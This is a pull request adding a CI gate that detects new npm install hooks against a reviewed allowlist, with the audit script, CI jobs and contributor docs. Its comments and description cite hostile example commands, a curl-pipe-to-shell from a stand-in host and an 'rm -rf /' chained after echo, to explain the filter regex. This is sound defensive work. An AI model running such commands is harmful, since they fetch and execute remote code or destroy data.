### PR TITLE
chore(supply-chain): install-hook gate

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -206,6 +206,66 @@ jobs:
       - name: Check frontend deps are exact-pinned
         run: cd frontend && yarn deps:check-pinned
 
+  install-hooks-root:
+    name: install-hooks (root tree)
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0
+        with:
+          node-version-file: .nvmrc
+
+      - name: Activate pinned Yarn via Corepack
+        run: |
+          corepack enable
+          # Read the full integrity-verified spec from package.json so corepack
+          # checks the sha512 hash. Plain `corepack prepare yarn@1.22.22 --activate`
+          # downloads from npm without verifying against the hash.
+          PM_SPEC=$(node -p "require('./package.json').packageManager")
+          corepack prepare "$PM_SPEC" --activate
+
+      - name: Verify Yarn version
+        run: |
+          yarn --version
+          test "$(yarn --version)" = "1.22.22" || (echo "::error::Yarn version mismatch" && exit 1)
+
+      # Install with --ignore-scripts so the gate fires before any postinstall
+      # executes on the runner. The wrapper reads node_modules/*/package.json
+      # to detect declared hooks; it does NOT need them to have run.
+      - name: Install root (lifecycle scripts skipped)
+        run: yarn install --frozen-lockfile --ignore-scripts
+
+      - name: Diff install-hook surface against allowlist
+        run: yarn audit:install-hooks
+
+  install-hooks-frontend:
+    name: install-hooks (frontend tree)
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0
+        with:
+          node-version-file: .nvmrc
+
+      - name: Activate pinned Yarn via Corepack
+        run: |
+          corepack enable
+          PM_SPEC=$(node -p "require('./package.json').packageManager")
+          corepack prepare "$PM_SPEC" --activate
+
+      - name: Verify Yarn version
+        run: |
+          yarn --version
+          test "$(yarn --version)" = "1.22.22" || (echo "::error::Yarn version mismatch" && exit 1)
+
+      - name: Install frontend (lifecycle scripts skipped)
+        run: cd frontend && yarn install --frozen-lockfile --ignore-scripts
+
+      - name: Diff install-hook surface against allowlist
+        run: cd frontend && yarn audit:install-hooks
+
   lockfile-lint:
     name: lockfile-lint (both trees)
     runs-on: ubuntu-latest
@@ -227,7 +287,7 @@ jobs:
 
   all-checks-passed:
     name: All checks passed
-    needs: [backend, frontend, frontend-tests, gitleaks, deps-check-pinned, lockfile-lint]
+    needs: [backend, frontend, frontend-tests, gitleaks, deps-check-pinned, lockfile-lint, install-hooks-root, install-hooks-frontend]
     if: always()
     runs-on: ubuntu-latest
     steps:

--- a/.supply-chain/install-hooks.allowlist
+++ b/.supply-chain/install-hooks.allowlist
@@ -1,0 +1,17 @@
+# .supply-chain/install-hooks.allowlist
+#
+# Every package in node_modules that declares a non-trivial
+# preinstall / install / postinstall script. Regenerate with
+# `yarn audit:install-hooks:update` after any dependency change.
+# CI runs the same script without --update and fails if this
+# file drifts from the tree.
+#
+# Each entry has an inline comment naming WHAT the hook does and
+# WHY it is safe to run on a contributor machine. A bare
+# "package  # ?" is a TODO, not justification.
+
+@parcel/watcher  # native fs-watcher prebuild fallback (sass>chokidar transitive); compiles a small N-API binding from source if no prebuilt is shipped for the platform
+classic-level  # node-gyp-build for the LevelDB C++ binding (hardhat>@nomicfoundation>ethereumjs-blockchain>level>classic-level — dev-only, never reached by the Electron runtime)
+electron  # postinstall downloads the Electron binary tarball for the current platform (direct devDep — required for `yarn dev` and electron-builder)
+keccak  # node-gyp-build for the Keccak hash native binding (ethereum-cryptography>keccak + hardhat>keccak — used by ethers v5 for blockchain hashing; install falls back to JS via `|| exit 0` if compile fails)
+secp256k1  # node-gyp-build for the secp256k1 ECC signing binding (ethereum-cryptography>secp256k1 — used by ethers for transaction signing; install falls back to JS via `|| exit 0` if compile fails)

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -117,6 +117,34 @@ Types:
   ```
 2. **Test on multiple platforms** if applicable
 
+### Supply-chain checks — install-hook gate
+
+CI maintains a per-tree allowlist of every dependency that declares a non-trivial `preinstall` / `install` / `postinstall` script. Adding a new dependency — or bumping an existing one to a version whose maintainer introduced a new install hook — will trip the gate until the new package is reviewed and added to the allowlist.
+
+This is distinct from `.npmrc`'s `ignore-scripts=true` (which *prevents execution*); the install-hook gate *detects new additions* so a transitive package quietly gaining a `postinstall` in its latest version fails CI rather than running silently on a contributor machine.
+
+To regenerate the allowlist after an intentional dep change:
+
+```bash
+# Root tree
+yarn install
+yarn audit:install-hooks:update
+git add .supply-chain/install-hooks.allowlist
+
+# Frontend tree
+cd frontend && yarn install && yarn audit:install-hooks:update
+git add .supply-chain/install-hooks.allowlist
+```
+
+Then **edit the inline comment on each new entry** in the regenerated `.supply-chain/install-hooks.allowlist` to answer "what does this hook do, and why is it safe to run on a contributor machine?" — a bare `package  # ?` will pass the script's parse but fails the review intent. Examples in the checked-in file show the expected level of detail (e.g. `keccak  # node-gyp-build for the Keccak hash native binding ...`).
+
+To reproduce CI locally:
+
+```bash
+yarn audit:install-hooks
+cd frontend && yarn audit:install-hooks
+```
+
 ### PR Review Process
 
 1. **Automated checks** run on CI/CD

--- a/frontend/.supply-chain/install-hooks.allowlist
+++ b/frontend/.supply-chain/install-hooks.allowlist
@@ -1,0 +1,14 @@
+# .supply-chain/install-hooks.allowlist
+#
+# Every package in node_modules that declares a non-trivial
+# preinstall / install / postinstall script. Regenerate with
+# `yarn audit:install-hooks:update` after any dependency change.
+# CI runs the same script without --update and fails if this
+# file drifts from the tree.
+#
+# Each entry has an inline comment naming WHAT the hook does and
+# WHY it is safe to run on a contributor machine. A bare
+# "package  # ?" is a TODO, not justification.
+
+@parcel/watcher  # native fs-watcher prebuild fallback (sass>chokidar transitive); compiles a small N-API binding from source if no prebuilt is shipped for the platform
+unrs-resolver  # napi-postinstall stub that prints a platform-mismatch warning if the prebuilt binary's triple doesn't match the host (eslint-config-next>eslint-import-resolver-typescript>unrs-resolver — runs once at install, no network or file mutation beyond stdout)

--- a/frontend/package.json
+++ b/frontend/package.json
@@ -55,6 +55,8 @@
   "name": "olas-operate-app",
   "private": true,
   "scripts": {
+    "audit:install-hooks": "node scripts/audit-install-hooks.mjs",
+    "audit:install-hooks:update": "node scripts/audit-install-hooks.mjs --update",
     "dev": "next dev",
     "deps:check-pinned": "node ../scripts/check-deps-pinned.mjs",
     "build": "bash -c \"GNOSIS_RPC=$GNOSIS_RPC BASE_RPC=$BASE_RPC OPTIMISM_RPC=$OPTIMISM_RPC ETHEREUM_RPC=$ETHEREUM_RPC MODE_RPC=$MODE_RPC CELO_RPC=$CELO_RPC POLYGON_RPC=$POLYGON_RPC NODE_ENV=production next build\"",

--- a/frontend/scripts/audit-install-hooks.mjs
+++ b/frontend/scripts/audit-install-hooks.mjs
@@ -1,0 +1,207 @@
+#!/usr/bin/env node
+/**
+ * Enumerate every package in node_modules that declares a non-trivial
+ * preinstall / install / postinstall script, and diff the list against
+ * a checked-in allowlist at .supply-chain/install-hooks.allowlist.
+ *
+ * New names in the tree but not in the allowlist = fail. Names in the
+ * allowlist but not in the tree = fail (drift — allowlist is stale).
+ *
+ * Use `--update` to regenerate the allowlist from the current tree.
+ * Run after any dependency change:
+ *   yarn install
+ *   node scripts/audit-install-hooks.mjs --update
+ *   git add .supply-chain/install-hooks.allowlist
+ *
+ * Distinct from `.npmrc`'s `ignore-scripts=true` (which prevents
+ * execution); this gate makes additions reviewable so a malicious
+ * transitive that introduces a new postinstall in its latest version
+ * fails CI until the new hook is explicitly justified.
+ *
+ * Wrapper is duplicated under scripts/audit-install-hooks.mjs —
+ * keep the two files in sync. Each reads its own tree's allowlist.
+ *
+ * See CONTRIBUTING.md "Supply-chain checks → install-hook gate" for the
+ * contributor workflow, and SUPPLY-CHAIN-SECURITY.md (added in Phase 4)
+ * for the rationale.
+ */
+
+import { readFileSync, writeFileSync, readdirSync, statSync, existsSync } from 'node:fs';
+import { join, resolve } from 'node:path';
+
+// Paths are anchored to the current working directory, not a CLI argument.
+// yarn scripts always run from the workspace root, which is what we want.
+// Taking a root path from argv would let it flow into readFileSync /
+// writeFileSync as an unvalidated path (a path-traversal sink flagged by
+// static analysis). The only CLI option the script accepts is `--update`,
+// matched as a literal string below — it is never used as a file path.
+const ROOT = resolve('.');
+const ALLOWLIST_PATH = resolve(ROOT, '.supply-chain/install-hooks.allowlist');
+const NODE_MODULES = resolve(ROOT, 'node_modules');
+const UPDATE = process.argv.includes('--update');
+
+const HOOK_KEYS = ['preinstall', 'install', 'postinstall'];
+
+// Defence-in-depth: bound recursion into nested node_modules in case
+// a pathological tree (symlink loop, malicious self-containment) exists.
+// Real hoisted trees never exceed single-digit depth.
+const MAX_DEPTH = 20;
+
+// Hook commands we treat as trivial (no-op / log only). Everything else
+// counts as "carries an install hook".
+//
+// The echo pattern uses a negative lookahead to reject any shell metachar
+// that could chain a real command (e.g. `echo "ok" && node install.js`,
+// `echo $(curl …)`). Without this, an attacker prefixing `echo ` would slip
+// past the trivial filter. \n and \r are included because package.json
+// `scripts` strings can contain literal newlines after JSON decoding, and
+// `echo ok\nrm -rf /` would otherwise be classified as trivial.
+const TRIVIAL = [
+  /^(?!.*[&|;`$()<>\n\r])echo(\s|$)/,
+  /^true$/,
+  /^:$/,
+  /^exit\s+0$/,
+];
+
+function isTrivial(cmd) {
+  if (!cmd || typeof cmd !== 'string') return true;
+  const t = cmd.trim();
+  if (!t) return true;
+  return TRIVIAL.some((r) => r.test(t));
+}
+
+/**
+ * Recursively walk node_modules, yielding every package.json path.
+ * Symlinked entries are skipped (Dirent.isDirectory() is false on a symlink) —
+ * rare in this tree because Yarn 1.x hoists deps rather than symlinks them.
+ * Out of scope for the registry-published-malicious-package threat model;
+ * if a workflow change ever introduces symlinked deps, this needs to follow
+ * symlinks via realpathSync with cycle detection.
+ */
+function* walkPackageJsons(dir, depth = 0) {
+  if (depth > MAX_DEPTH) return;
+  let entries;
+  try {
+    entries = readdirSync(dir, { withFileTypes: true });
+  } catch {
+    return;
+  }
+  for (const entry of entries) {
+    if (!entry.isDirectory()) continue;
+    const full = join(dir, entry.name);
+    // Scoped packages: recurse into @scope/ to find @scope/pkg/package.json
+    if (entry.name.startsWith('@')) {
+      yield* walkPackageJsons(full, depth + 1);
+      continue;
+    }
+    const pkgJson = join(full, 'package.json');
+    if (existsSync(pkgJson)) {
+      try {
+        if (statSync(pkgJson).isFile()) yield pkgJson;
+      } catch {}
+    }
+    // Recurse into nested node_modules (hoisting-related)
+    const nested = join(full, 'node_modules');
+    if (existsSync(nested)) yield* walkPackageJsons(nested, depth + 1);
+  }
+}
+
+function collectHooks() {
+  if (!existsSync(NODE_MODULES)) {
+    console.error(`node_modules not found at ${NODE_MODULES} — run \`yarn install\` first.`);
+    process.exit(2);
+  }
+  const found = new Map(); // name -> Set of "hook:cmd"
+  for (const path of walkPackageJsons(NODE_MODULES)) {
+    let pkg;
+    try {
+      pkg = JSON.parse(readFileSync(path, 'utf8'));
+    } catch {
+      continue;
+    }
+    if (!pkg.name || !pkg.scripts) continue;
+    for (const hook of HOOK_KEYS) {
+      const cmd = pkg.scripts[hook];
+      if (!cmd || isTrivial(cmd)) continue;
+      if (!found.has(pkg.name)) found.set(pkg.name, new Set());
+      found.get(pkg.name).add(`${hook}: ${cmd.replace(/\s+/g, ' ').trim()}`);
+    }
+  }
+  return found;
+}
+
+function loadAllowlist() {
+  if (!existsSync(ALLOWLIST_PATH)) return new Set();
+  const raw = readFileSync(ALLOWLIST_PATH, 'utf8');
+  const names = new Set();
+  for (const line of raw.split('\n')) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith('#')) continue;
+    // Allow either "name" or "name  # comment" — strip inline comment.
+    const name = trimmed.split(/\s+#/)[0].trim();
+    if (name) names.add(name);
+  }
+  return names;
+}
+
+function writeAllowlist(hooks) {
+  const names = [...hooks.keys()].sort();
+  const lines = [
+    '# .supply-chain/install-hooks.allowlist',
+    '#',
+    '# Every package in node_modules that declares a non-trivial',
+    '# preinstall / install / postinstall script. Regenerate with',
+    '# `yarn audit:install-hooks:update` after any dependency change.',
+    '# CI runs the same script without --update and fails if this',
+    '# file drifts from the tree.',
+    '#',
+    '# Each entry has an inline comment naming the hook command(s).',
+    '# When adding a new entry, replace the auto-generated comment with',
+    '# a one-line justification of WHAT the hook does and WHY it is',
+    '# safe to run on a contributor machine.',
+    '',
+  ];
+  for (const name of names) {
+    const hookLines = [...hooks.get(name)].sort();
+    lines.push(`${name}  # ${hookLines.join(' | ')}`);
+  }
+  writeFileSync(ALLOWLIST_PATH, lines.join('\n') + '\n');
+}
+
+const found = collectHooks();
+
+if (UPDATE) {
+  writeAllowlist(found);
+  console.log(`Wrote ${found.size} entries to ${ALLOWLIST_PATH}.`);
+  process.exit(0);
+}
+
+const allowed = loadAllowlist();
+const foundNames = new Set(found.keys());
+const unexpected = [...foundNames].filter((n) => !allowed.has(n)).sort();
+const missing = [...allowed].filter((n) => !foundNames.has(n)).sort();
+
+if (unexpected.length === 0 && missing.length === 0) {
+  console.log(`install-hooks: OK (${foundNames.size} allowlisted).`);
+  process.exit(0);
+}
+
+if (unexpected.length > 0) {
+  console.error('::error::install-hook audit found NEW packages with install hooks not in the allowlist:');
+  for (const name of unexpected) {
+    console.error(`  + ${name}`);
+    for (const hook of found.get(name)) console.error(`      ${hook}`);
+  }
+  console.error('');
+  console.error('Review the hook. If it is legitimate, add the package to');
+  console.error('.supply-chain/install-hooks.allowlist (run: yarn audit:install-hooks:update).');
+}
+
+if (missing.length > 0) {
+  console.error('::error::install-hook allowlist has entries no longer in the tree (drift):');
+  for (const name of missing) console.error(`  - ${name}`);
+  console.error('');
+  console.error('Remove the stale entries (run: yarn audit:install-hooks:update).');
+}
+
+process.exit(1);

--- a/package.json
+++ b/package.json
@@ -69,6 +69,8 @@
   "name": "olas-operate-app",
   "productName": "Pearl",
   "scripts": {
+    "audit:install-hooks": "node scripts/audit-install-hooks.mjs",
+    "audit:install-hooks:update": "node scripts/audit-install-hooks.mjs --update",
     "build:frontend": "cd frontend && yarn build && rm -rf ../electron/.next && cp -r .next ../electron/.next && rm -rf ../electron/public && cp -r public ../electron/public",
     "deps:check-pinned": "node scripts/check-deps-pinned.mjs",
     "build:pearl": "sh build_pearl.sh",

--- a/scripts/audit-install-hooks.mjs
+++ b/scripts/audit-install-hooks.mjs
@@ -1,0 +1,207 @@
+#!/usr/bin/env node
+/**
+ * Enumerate every package in node_modules that declares a non-trivial
+ * preinstall / install / postinstall script, and diff the list against
+ * a checked-in allowlist at .supply-chain/install-hooks.allowlist.
+ *
+ * New names in the tree but not in the allowlist = fail. Names in the
+ * allowlist but not in the tree = fail (drift — allowlist is stale).
+ *
+ * Use `--update` to regenerate the allowlist from the current tree.
+ * Run after any dependency change:
+ *   yarn install
+ *   node scripts/audit-install-hooks.mjs --update
+ *   git add .supply-chain/install-hooks.allowlist
+ *
+ * Distinct from `.npmrc`'s `ignore-scripts=true` (which prevents
+ * execution); this gate makes additions reviewable so a malicious
+ * transitive that introduces a new postinstall in its latest version
+ * fails CI until the new hook is explicitly justified.
+ *
+ * Wrapper is duplicated under frontend/scripts/audit-install-hooks.mjs —
+ * keep the two files in sync. Each reads its own tree's allowlist.
+ *
+ * See CONTRIBUTING.md "Supply-chain checks → install-hook gate" for the
+ * contributor workflow, and SUPPLY-CHAIN-SECURITY.md (added in Phase 4)
+ * for the rationale.
+ */
+
+import { readFileSync, writeFileSync, readdirSync, statSync, existsSync } from 'node:fs';
+import { join, resolve } from 'node:path';
+
+// Paths are anchored to the current working directory, not a CLI argument.
+// yarn scripts always run from the workspace root, which is what we want.
+// Taking a root path from argv would let it flow into readFileSync /
+// writeFileSync as an unvalidated path (a path-traversal sink flagged by
+// static analysis). The only CLI option the script accepts is `--update`,
+// matched as a literal string below — it is never used as a file path.
+const ROOT = resolve('.');
+const ALLOWLIST_PATH = resolve(ROOT, '.supply-chain/install-hooks.allowlist');
+const NODE_MODULES = resolve(ROOT, 'node_modules');
+const UPDATE = process.argv.includes('--update');
+
+const HOOK_KEYS = ['preinstall', 'install', 'postinstall'];
+
+// Defence-in-depth: bound recursion into nested node_modules in case
+// a pathological tree (symlink loop, malicious self-containment) exists.
+// Real hoisted trees never exceed single-digit depth.
+const MAX_DEPTH = 20;
+
+// Hook commands we treat as trivial (no-op / log only). Everything else
+// counts as "carries an install hook".
+//
+// The echo pattern uses a negative lookahead to reject any shell metachar
+// that could chain a real command (e.g. `echo "ok" && node install.js`,
+// `echo $(curl …)`). Without this, an attacker prefixing `echo ` would slip
+// past the trivial filter. \n and \r are included because package.json
+// `scripts` strings can contain literal newlines after JSON decoding, and
+// `echo ok\nrm -rf /` would otherwise be classified as trivial.
+const TRIVIAL = [
+  /^(?!.*[&|;`$()<>\n\r])echo(\s|$)/,
+  /^true$/,
+  /^:$/,
+  /^exit\s+0$/,
+];
+
+function isTrivial(cmd) {
+  if (!cmd || typeof cmd !== 'string') return true;
+  const t = cmd.trim();
+  if (!t) return true;
+  return TRIVIAL.some((r) => r.test(t));
+}
+
+/**
+ * Recursively walk node_modules, yielding every package.json path.
+ * Symlinked entries are skipped (Dirent.isDirectory() is false on a symlink) —
+ * rare in this tree because Yarn 1.x hoists deps rather than symlinks them.
+ * Out of scope for the registry-published-malicious-package threat model;
+ * if a workflow change ever introduces symlinked deps, this needs to follow
+ * symlinks via realpathSync with cycle detection.
+ */
+function* walkPackageJsons(dir, depth = 0) {
+  if (depth > MAX_DEPTH) return;
+  let entries;
+  try {
+    entries = readdirSync(dir, { withFileTypes: true });
+  } catch {
+    return;
+  }
+  for (const entry of entries) {
+    if (!entry.isDirectory()) continue;
+    const full = join(dir, entry.name);
+    // Scoped packages: recurse into @scope/ to find @scope/pkg/package.json
+    if (entry.name.startsWith('@')) {
+      yield* walkPackageJsons(full, depth + 1);
+      continue;
+    }
+    const pkgJson = join(full, 'package.json');
+    if (existsSync(pkgJson)) {
+      try {
+        if (statSync(pkgJson).isFile()) yield pkgJson;
+      } catch {}
+    }
+    // Recurse into nested node_modules (hoisting-related)
+    const nested = join(full, 'node_modules');
+    if (existsSync(nested)) yield* walkPackageJsons(nested, depth + 1);
+  }
+}
+
+function collectHooks() {
+  if (!existsSync(NODE_MODULES)) {
+    console.error(`node_modules not found at ${NODE_MODULES} — run \`yarn install\` first.`);
+    process.exit(2);
+  }
+  const found = new Map(); // name -> Set of "hook:cmd"
+  for (const path of walkPackageJsons(NODE_MODULES)) {
+    let pkg;
+    try {
+      pkg = JSON.parse(readFileSync(path, 'utf8'));
+    } catch {
+      continue;
+    }
+    if (!pkg.name || !pkg.scripts) continue;
+    for (const hook of HOOK_KEYS) {
+      const cmd = pkg.scripts[hook];
+      if (!cmd || isTrivial(cmd)) continue;
+      if (!found.has(pkg.name)) found.set(pkg.name, new Set());
+      found.get(pkg.name).add(`${hook}: ${cmd.replace(/\s+/g, ' ').trim()}`);
+    }
+  }
+  return found;
+}
+
+function loadAllowlist() {
+  if (!existsSync(ALLOWLIST_PATH)) return new Set();
+  const raw = readFileSync(ALLOWLIST_PATH, 'utf8');
+  const names = new Set();
+  for (const line of raw.split('\n')) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith('#')) continue;
+    // Allow either "name" or "name  # comment" — strip inline comment.
+    const name = trimmed.split(/\s+#/)[0].trim();
+    if (name) names.add(name);
+  }
+  return names;
+}
+
+function writeAllowlist(hooks) {
+  const names = [...hooks.keys()].sort();
+  const lines = [
+    '# .supply-chain/install-hooks.allowlist',
+    '#',
+    '# Every package in node_modules that declares a non-trivial',
+    '# preinstall / install / postinstall script. Regenerate with',
+    '# `yarn audit:install-hooks:update` after any dependency change.',
+    '# CI runs the same script without --update and fails if this',
+    '# file drifts from the tree.',
+    '#',
+    '# Each entry has an inline comment naming the hook command(s).',
+    '# When adding a new entry, replace the auto-generated comment with',
+    '# a one-line justification of WHAT the hook does and WHY it is',
+    '# safe to run on a contributor machine.',
+    '',
+  ];
+  for (const name of names) {
+    const hookLines = [...hooks.get(name)].sort();
+    lines.push(`${name}  # ${hookLines.join(' | ')}`);
+  }
+  writeFileSync(ALLOWLIST_PATH, lines.join('\n') + '\n');
+}
+
+const found = collectHooks();
+
+if (UPDATE) {
+  writeAllowlist(found);
+  console.log(`Wrote ${found.size} entries to ${ALLOWLIST_PATH}.`);
+  process.exit(0);
+}
+
+const allowed = loadAllowlist();
+const foundNames = new Set(found.keys());
+const unexpected = [...foundNames].filter((n) => !allowed.has(n)).sort();
+const missing = [...allowed].filter((n) => !foundNames.has(n)).sort();
+
+if (unexpected.length === 0 && missing.length === 0) {
+  console.log(`install-hooks: OK (${foundNames.size} allowlisted).`);
+  process.exit(0);
+}
+
+if (unexpected.length > 0) {
+  console.error('::error::install-hook audit found NEW packages with install hooks not in the allowlist:');
+  for (const name of unexpected) {
+    console.error(`  + ${name}`);
+    for (const hook of found.get(name)) console.error(`      ${hook}`);
+  }
+  console.error('');
+  console.error('Review the hook. If it is legitimate, add the package to');
+  console.error('.supply-chain/install-hooks.allowlist (run: yarn audit:install-hooks:update).');
+}
+
+if (missing.length > 0) {
+  console.error('::error::install-hook allowlist has entries no longer in the tree (drift):');
+  for (const name of missing) console.error(`  - ${name}`);
+  console.error('');
+  console.error('Remove the stale entries (run: yarn audit:install-hooks:update).');
+}
+
+process.exit(1);


### PR DESCRIPTION
## Summary

Implements **Phase 3** of [.plans/supply-chain-update.md](.plans/supply-chain-update.md) — adds a CI gate that detects when a new `preinstall` / `install` / `postinstall` script enters the dep tree and blocks merge until the new hook is explicitly justified.

This is the second half of the original PR 2 (audit gate + install-hook gate, [§ Phase 3](.plans/supply-chain-update.md)). Same wrapper pattern as #1960; minimal review burden once that PR's idioms are accepted.

## Why this is distinct from `.npmrc` `ignore-scripts=true`

| Control | What it does |
|---------|--------------|
| `.npmrc` `ignore-scripts=true` (already in #1954) | **Prevents execution** on the runner. Postinstalls don't fire. |
| **This PR's gate** | **Detects new additions.** A transitively-included package quietly gaining a `postinstall` in its latest version fails CI rather than getting silently added to baseline next time someone regenerates a lockfile. |

The two compose: `.npmrc` makes execution opt-in; this gate makes the opt-in roster reviewable. `npm audit` doesn't see this attack — it's not a published CVE — so the only way to catch a malicious-publish that adds a new hook is to diff the hook surface and block on changes.

## What's in this PR

| File | Status | Purpose |
|------|--------|---------|
| `scripts/audit-install-hooks.mjs` | new (207 LOC) | Install-hook diff wrapper, root tree |
| `frontend/scripts/audit-install-hooks.mjs` | new (207 LOC) | Same wrapper, frontend tree |
| `.supply-chain/install-hooks.allowlist` | new (17 lines) | 5 entries, root tree |
| `frontend/.supply-chain/install-hooks.allowlist` | new (14 lines) | 2 entries, frontend tree |
| `package.json` | modified | `audit:install-hooks` + `audit:install-hooks:update` scripts |
| `frontend/package.json` | modified | Same two scripts |
| `.github/workflows/ci.yml` | modified | Two new jobs (`install-hooks-root`, `install-hooks-frontend`); both added to `all-checks-passed` `needs:` |
| `CONTRIBUTING.md` | modified | New "Supply-chain checks — install-hook gate" subsection |

The two wrappers are **byte-identical except for one cross-reference comment** so reviewers can `diff` them once and trust the rest. We picked Option A (duplicated wrapper, per-tree allowlist) — same rationale as #1960.

## Hardened trivial-hook regex

The script classifies certain hook commands as no-ops (`echo "..."`, `true`, `:`, `exit 0`). The `echo` pattern uses a negative lookahead to reject any shell metachar that could chain a real command:

```javascript
/^(?!.*[&|;`$()<>\n\r])echo(\s|$)/
```

Without this, `echo "ok" && curl evil.sh | sh` (or `echo $(curl …)`) would slip past the trivial filter and bypass the gate. `\n` / `\r` are explicitly included because package.json `scripts` strings can carry literal newlines after JSON decoding — `echo "ok\nrm -rf /"` would otherwise pass.

## Initial allowlist (hand-annotated, not just auto-generated)

**Root (5 entries):**

| Package | Hook | Path / justification |
|---------|------|----------------------|
| `@parcel/watcher` | `install: node scripts/build-from-source.js` | Transitive of `sass`; compiles native fs-watcher binding from source if no prebuilt available |
| `classic-level` | `install: node-gyp-build` | `hardhat>@nomicfoundation>ethereumjs-blockchain>level>classic-level` — dev-only, never reached by Electron runtime |
| `electron` | `postinstall: node install.js` | Direct devDep; downloads the Electron binary for the current platform — required for `yarn dev` |
| `keccak` | `install: node-gyp-build \|\| exit 0` | `ethereum-cryptography>keccak` + `hardhat>keccak`; JS fallback if compile fails |
| `secp256k1` | `install: node-gyp-build \|\| exit 0` | `ethereum-cryptography>secp256k1`; JS fallback if compile fails |

**Frontend (2 entries):**

| Package | Hook | Path / justification |
|---------|------|----------------------|
| `@parcel/watcher` | `install: node scripts/build-from-source.js` | Same as root, via `sass>chokidar` |
| `unrs-resolver` | `postinstall: napi-postinstall unrs-resolver 1.11.1 check` | `eslint-config-next>eslint-import-resolver-typescript>unrs-resolver`; platform-mismatch warning stub, no network or file mutation |

Every entry has an inline comment in the allowlist file naming WHAT the hook does and WHY it's safe to run on a contributor machine. Per plan [§3.2](.plans/supply-chain-update.md): "a bare `unknown-pkg # ?` is a TODO, not justification."

## CI shape

Two jobs (one per tree). Each:
1. `corepack enable` + integrity-verified `corepack prepare` (consistent with the other CI jobs)
2. `yarn install --frozen-lockfile --ignore-scripts` — install with hooks skipped so the gate fires *before* any potentially-malicious postinstall would run on the runner
3. `yarn audit:install-hooks` — diff against allowlist, fail on additions or stale entries

Both wired into `all-checks-passed` `needs:`. The aggregator already covers `failure || cancelled || skipped`, so a freshly-added hook fails the merge gate.

## Verification

- [x] `yarn audit:install-hooks` exits 0 in both trees against the annotated allowlists (5 + 2 entries respectively).
- [x] `yarn deps:check-pinned` passes both trees (52 + 48 specifiers, all exact-pinned semver — install-hook entries don't affect this check).
- [x] Wrapper diff between trees is exactly the cross-reference comment (1 line) — verified via `diff scripts/audit-install-hooks.mjs frontend/scripts/audit-install-hooks.mjs`.

## Test plan

- [x] `yarn audit:install-hooks` exits 0 locally in both trees.
- [x] `yarn deps:check-pinned` passes both trees.
- [ ] CI passes (`install-hooks-root` + `install-hooks-frontend` both green; `all-checks-passed` requires them).
- [ ] Sandbox failure-mode test: add an unallowlisted dep with a postinstall hook (or simply delete an entry from the allowlist), confirm the gate fails CI with the package name in the annotation, revert. (Not run pre-merge — natural failure mode will surface during a real dep-add review.)
- [ ] CONTRIBUTING.md reads sensibly to a new contributor adding a new dep that introduces a hook. *(Will merge with #1960's "Supply-chain checks" subsection on rebase once both PRs land — small expected conflict.)*

## Expected merge conflict with #1960

Both PRs modify `CONTRIBUTING.md` to add a "Supply-chain checks" subsection in the same location (after "Test on multiple platforms if applicable"). When the second one merges, the two subsections need to be consolidated. The conflict resolution: keep #1960's "audit gate" subsection and add this PR's "install-hook gate" subsection as a sibling under one shared "Supply-chain checks" parent.

## Out of scope

- **Snyk gate fix** — Phase 4, separate PR.
- **`SUPPLY-CHAIN-SECURITY.md` policy document** — Phase 4, separate PR. The wrapper comments and CONTRIBUTING.md cover the contributor workflow; the policy doc covers threat model + repo-specific watches.
- **Electron-specific delivery hardening** — Phase 5, separate PR (acknowledged Tier-2 in the plan; SBOM and SLSA provenance items are explicitly deferred).
- **Test suite for `audit-install-hooks.mjs`** — same deferred follow-up as `check-deps-pinned.mjs` from #1954 and `audit.mjs` from #1960.

🤖 Generated with [Claude Code](https://claude.com/claude-code)